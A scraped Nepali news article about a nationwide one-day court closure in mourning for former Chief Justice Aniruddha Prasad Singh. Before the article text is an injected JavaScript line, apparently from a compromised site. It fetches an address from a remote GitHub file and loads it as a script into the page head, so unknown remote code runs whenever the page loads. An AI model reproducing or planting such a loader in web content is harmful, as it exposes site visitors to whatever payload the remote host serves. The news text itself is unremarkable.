;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज सबै अदालत बन्द – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
जुनेली बिशेष

आज सबै अदालत बन्द

असोज १,

काठमाडौं । सर्वोच्च अदालतले पूर्व प्रधानन्यायाधीश अनिरुद्धप्रसाद सिंहको निधनमा आज एक दिन देशभरका अदालतमा विदा दिने निर्णय गरेको छ। सर्वोच्च अदालतको आकस्मिक पूर्ण बैठकले पूर्व प्रधानन्यायाधीश सिंहको निधनप्रति दुःख व्यक्त गर्दै सर्वोच्च अदालतसहित देशभरका अदालतमा आज शोक बिदा दिने निर्णय गरेको हो।

सिंहको निधनबाट राष्ट्रले एउटा सच्चा राष्ट्रप्रेमी र न्यायिक व्यक्तित्व गुमाएको उल्लेख गर्दै आत्माको चीर शान्तिको कामनासहित शोक सन्तप्त परिवारजनमा समवेदना प्रकट गरिएको सर्वोच्च अदालतका प्रवक्ता भद्रकाली पोखरेलले जारी गरेको विज्ञप्तिमा उल्लेख छ। सप्तरी जिल्लामा १९७६ सालमा जन्मिएका सिंह २०१३ साल जेठ ८ गते प्रधानन्यायाधीश नियुक्त भई २०१६ असार १५ गतेसम्म काम गरेका थिए।

फेसबुक प्रतिक्रियाहरु